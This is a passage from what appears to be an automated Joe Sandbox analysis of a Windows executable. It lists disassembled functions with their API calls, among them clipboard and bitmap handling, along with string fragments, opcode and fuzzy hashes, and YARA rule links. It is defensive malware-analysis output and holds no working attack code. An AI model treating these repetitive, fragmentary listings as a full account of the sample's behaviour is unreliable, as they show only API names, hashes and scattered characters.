                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 43b9f320142967e49483a24319c81f30e5f80492a493a8d78e07eac285069b5f
                                                                                                      • Instruction ID: 23d06cee7ac1d95f609f337c74badb0ac4e80c75d4c1d8922e589ed62beff187
                                                                                                      • Opcode Fuzzy Hash: 43b9f320142967e49483a24319c81f30e5f80492a493a8d78e07eac285069b5f
                                                                                                      • Instruction Fuzzy Hash: 231170F1D05218AFF7248A24DC55BEB7B79FB90300F1040FAD5099A291D6789EC69E21
                                                                                                      Function 0041E901 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 3ab1d15e4c76afec8f9f42034f7a9f095e405669456db6c8dcb559ca66c4b1db
                                                                                                      • Instruction ID: ff1625d17a939c433f49c94dd42cd3e4859bb0651af4785c490c0010a0f4f517
                                                                                                      • Opcode Fuzzy Hash: 3ab1d15e4c76afec8f9f42034f7a9f095e405669456db6c8dcb559ca66c4b1db
                                                                                                      • Instruction Fuzzy Hash: 98E02BF3E0A6406FF350CA15EC0A7DF251997A1300F1941BAF58CC11C2D57D4AC10903
                                                                                                      Function 0041ED74 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 499f3199082d29d751a609156671971a83779824d1c62d8330204728a1047845
                                                                                                      • Instruction ID: b752ed7810c9894da0afe4144d79f2d33d513b82f25b5e0b462ab68b2da7bf57
                                                                                                      • Opcode Fuzzy Hash: 499f3199082d29d751a609156671971a83779824d1c62d8330204728a1047845
                                                                                                      • Instruction Fuzzy Hash: 60B092F094515486F7608A45D80A38DB6686B10311F0480A2D04A6418182B40ECB8E03

                                                                                                      Non-executed Functions

                                                                                                      Function 0040F771 Relevance: 91.9, Strings: 73, Instructions: 614COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: D$D$D$E$E$I$L$L$L$L?9C$N$P$Q$R$T$W$^ ]$a$a$a$a$a$a$a$b$c$c$c$d$e$e$e$e$e$e$f$g$i$i$i$l$l$l$m$n$o$o$o$o$o$r$r$r$r$r$r$r$s$s$t$t$t$t$t$t$t$u$u$x$y$y$y$y
                                                                                                      • API String ID: 0-1277560817
                                                                                                      • Opcode ID: 0074db72ae66454033b6857f414772daa179a9a5eaa27df0bcf7b34bc07a5c5f
                                                                                                      • Instruction ID: a42fb7ffc49dbee19d6c942c2b38740f283d1fe120c719d5cf75fc6d037be17d
                                                                                                      • Opcode Fuzzy Hash: 0074db72ae66454033b6857f414772daa179a9a5eaa27df0bcf7b34bc07a5c5f
                                                                                                      • Instruction Fuzzy Hash: AC42E361D082A88AFB208725DC447EABBB1EF51304F1480FAD44D67681D7BE5EC9CF66
                                                                                                      Function 0040E156 Relevance: 55.2, Strings: 44, Instructions: 211COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C$R$R$S$S$U$U$U$a$a$c$c$c$d$d$e$e$e$e$e$g$g$i$i$i$i$l$l$n$n$n$n$o$o$p$r$r$r$s$t$t$t$t$t
                                                                                                      • API String ID: 0-1493201413
                                                                                                      • Opcode ID: 7202f0dccd20099db41f77017beecca377368f56476d0a0e8018768580032a77
                                                                                                      • Instruction ID: f6b775a9b90a8f6a89515ed236b037e65374fba5cf0fa3acdc405c0f82a6fe92
                                                                                                      • Opcode Fuzzy Hash: 7202f0dccd20099db41f77017beecca377368f56476d0a0e8018768580032a77
                                                                                                      • Instruction Fuzzy Hash: A491A161D0C6E889F7218628CC187DABE719F12308F0440F9C58D6A6C2D7BE0FD8CB66
                                                                                                      Function 0041C4AE Relevance: 49.4, Strings: 39, Instructions: 605COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %02d$@ID$E$L$L$P$P$V$W$a$a$a$b$c$c$d$e$e$i$i$i$l$o$o$o$r$r$r$r$r$s$s$t$t$t$t$u$x$y
                                                                                                      • API String ID: 0-2432051593
                                                                                                      • Opcode ID: 8d424728ccff6202c7b214a81cbcd8de46411316d7680afcaa94cc8427f22226
                                                                                                      • Instruction ID: 3fa569cdde4ee442185d71556d40c4382b0c1c20d155b36fff6f15ef55cdde53
                                                                                                      • Opcode Fuzzy Hash: 8d424728ccff6202c7b214a81cbcd8de46411316d7680afcaa94cc8427f22226
                                                                                                      • Instruction Fuzzy Hash: 0632F370D082989AFB10DB25CC44BEE7BB5AF55304F1480EEE44DA72C2DA7D4B85CB66
                                                                                                      Function 004346D7 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 279clipboardwindowsleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004346DC
                                                                                                      • Sleep.KERNEL32(000000C8,?,00480744,00000000), ref: 004346F9
                                                                                                        • Part of subcall function 00434323: OpenClipboard.USER32(00000000), ref: 00434327
                                                                                                        • Part of subcall function 00434323: GetClipboardData.USER32(00000002), ref: 00434333
                                                                                                        • Part of subcall function 00434323: CopyImage.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0043433E
                                                                                                        • Part of subcall function 00434323: CloseClipboard.USER32 ref: 00434346
                                                                                                        • Part of subcall function 00434214: __EH_prolog.LIBCMT ref: 00434219
                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00434746
                                                                                                      • GetBitmapBits.GDI32(?,?,00000000), ref: 00434776
                                                                                                      • MessageBoxW.USER32(00000000,No-HBitmap,00000000,00000000), ref: 0043478B
                                                                                                      • MessageBoxW.USER32(00000000,Bitmap 32 Bit ?,00000000,00000000), ref: 004347D9
                                                                                                      • DeleteObject.GDI32(?), ref: 004347E0
                                                                                                      • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 00434969
                                                                                                      • DeleteObject.GDI32(?), ref: 00434975
                                                                                                      • SetBitmapBits.GDI32(?,00000000,?), ref: 00434988
                                                                                                      • Sleep.KERNEL32(00000064,?,00480744,00000000), ref: 00434996
                                                                                                      • OpenClipboard.USER32(00000000), ref: 0043499F
                                                                                                      • EmptyClipboard.USER32 ref: 004349A5
                                                                                                      • CloseClipboard.USER32 ref: 004349AB
                                                                                                      • Sleep.KERNEL32(00000064,?,00480744,00000000), ref: 004349B3
                                                                                                      • OpenClipboard.USER32(00000000), ref: 004349B6
                                                                                                      • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004349C3
                                                                                                      • SetClipboardData.USER32(00000002,00000000), ref: 004349CC
                                                                                                      • CloseClipboard.USER32 ref: 004349D2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$CloseObjectOpenSleep$BitmapBitsCopyDataDeleteH_prologImageMessage$CreateEmptySection
                                                                                                      • String ID: $ $($Bitmap 32 Bit ?$Err$No-Bitmap-PixWidthBytes: %d bmWidth:%d bmBitsPixel:%d hb:%d$No-HBitmap
                                                                                                      • API String ID: 3974696157-3879042627
                                                                                                      • Opcode ID: a937d04b343de918adc92969c675521d7c30741a729f2ed876f790ae341dfc15
                                                                                                      • Instruction ID: 80b149043df806acf39622e4d460c68fde9c3a0cf2f5144cc592970e13fc3556
                                                                                                      • Opcode Fuzzy Hash: a937d04b343de918adc92969c675521d7c30741a729f2ed876f790ae341dfc15
                                                                                                      • Instruction Fuzzy Hash: 00B168B2D00219EFDB14DFA9D8859EEBBB9FF48304F20512AE411B7251D7389A45CFA4
                                                                                                      Function 0040D7FC Relevance: 31.5, Strings: 25, Instructions: 228COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6G?A$E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-313819015
                                                                                                      • Opcode ID: a8a9d3bcf0e73faeddb1b46d0ba644554e9fd88e8d8cefca6da330e0ca369f41
                                                                                                      • Instruction ID: f181f306bfde44132fb8449efba4ae428e37aa5c2032e37fcb8b79b10ee707c6
                                                                                                      • Opcode Fuzzy Hash: a8a9d3bcf0e73faeddb1b46d0ba644554e9fd88e8d8cefca6da330e0ca369f41
                                                                                                      • Instruction Fuzzy Hash: 6FA1C271D082A88AFB218624DC447DABBB1AF51304F1480FAD44D67282DB7E5FC5CFA6
                                                                                                      Function 0040B191 Relevance: 30.6, Strings: 24, Instructions: 600COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 2cc5a05fcaa614479e64aa45d66b4238ffeba7556bd1cfc5efcf73bee94fb65e
                                                                                                      • Instruction ID: aa3318ecb92f0b20858f9ba3c417207d15684b5d702130a55ea4fae5999849c2
                                                                                                      • Opcode Fuzzy Hash: 2cc5a05fcaa614479e64aa45d66b4238ffeba7556bd1cfc5efcf73bee94fb65e
                                                                                                      • Instruction Fuzzy Hash: 4932E0B1D042688AFB248B14DC847EABBB5EF91314F1480FAD44967281D77D4FC5CBAA
                                                                                                      Function 004130FD Relevance: 30.5, Strings: 24, Instructions: 476COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
